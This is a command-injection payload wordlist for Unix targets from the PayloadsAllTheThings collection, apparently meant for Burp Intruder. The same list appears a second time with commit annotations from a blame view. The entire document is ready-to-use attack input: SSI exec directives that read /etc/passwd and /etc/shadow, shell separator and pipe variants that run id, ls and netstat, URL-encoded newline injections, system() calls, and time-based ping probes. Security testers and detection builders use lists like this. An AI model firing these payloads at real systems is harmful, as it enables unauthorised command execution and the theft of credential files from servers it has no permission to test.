PayloadsAllTheThings/Command Injection/Intruder/command-execution-unix.txt

&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
";id;"
';id;'
;id;
;id
;netstat -a;
"|id|"
'|id|'
|id
|/usr/bin/id
|id|
"|/usr/bin/id|"
'|/usr/bin/id|'
|/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%22%0A/usr/bin/id%0A%22
%27%0A/usr/bin/id%0A%27
%0A/usr/bin/id%0A
%0Aid%0A
"& ping -i 30 127.0.0.1 &"
'& ping -i 30 127.0.0.1 &'
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->`
			`<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->`
			`<!--#exec%20cmd="/usr/bin/id;-->`
			`<!--#exec%20cmd="/usr/bin/id;-->`
			`/index.html\|id\|`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`";id;"`
			`';id;'`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`;id;`
			`;id`
			`;netstat -a;`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`"\|id\|"`
			`'\|id\|'`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`\|id`
			`\|/usr/bin/id`
			`\|id\|`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`"\|/usr/bin/id\|"`
			`'\|/usr/bin/id\|'`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`\|/usr/bin/id\|`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`"\|\|/usr/bin/id\|"`
			`'\|\|/usr/bin/id\|'`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`\|\|/usr/bin/id\|`
			`\|id;`
			`\|\|/usr/bin/id;`
			`;id\|`
			`;\|/usr/bin/id\|`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`"\n/bin/ls -al\n"`
			`'\n/bin/ls -al\n'`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`\n/bin/ls -al\n`
			`\n/usr/bin/id\n`
			`\nid\n`
			`\n/usr/bin/id;`
			`\nid;`
			`\n/usr/bin/id\|`
			`\nid\|`
			`;/usr/bin/id\n`
			`;id\n`
			`\|usr/bin/id\n`
			`\|nid\n`
			`id`
			`/usr/bin/id`
			`a);id`
			`a;id`
			`a);id;`
			`a;id;`
			`a);id\|`
			`a;id\|`
			`a)\|id`
			`a\|id`
			`a)\|id;`
			`a\|id`
			`\|/bin/ls -al`
			`a);/usr/bin/id`
			`a;/usr/bin/id`
			`a);/usr/bin/id;`
			`a;/usr/bin/id;`
			`a);/usr/bin/id\|`
			`a;/usr/bin/id\|`
			`a)\|/usr/bin/id`
			`a\|/usr/bin/id`
			`a)\|/usr/bin/id;`
			`a\|/usr/bin/id`
			`;system('cat%20/etc/passwd')`
			`;system('id')`
			`;system('/usr/bin/id')`
			`%0Acat%20/etc/passwd`
			`%0A/usr/bin/id`
			`%0Aid`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`%22%0A/usr/bin/id%0A%22`
			`%27%0A/usr/bin/id%0A%27`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`%0A/usr/bin/id%0A`
			`%0Aid%0A`
Add escaped double or single quote cases 2020-01-17 01:41:12 +00:00			`"& ping -i 30 127.0.0.1 &"`
			`'& ping -i 30 127.0.0.1 &'`
LDAP & XPATH injection + Small fixes and payloads 2017-07-14 21:40:31 +00:00			`& ping -i 30 127.0.0.1 &`
			`& ping -n 30 127.0.0.1 &`
			`%0a ping -i 30 127.0.0.1 %0a`
			`ping 127.0.0.1`
			`\| id`
			`& id`
			`; id`
			`%0a id %0a`
			`id`
			`$;/usr/bin/id`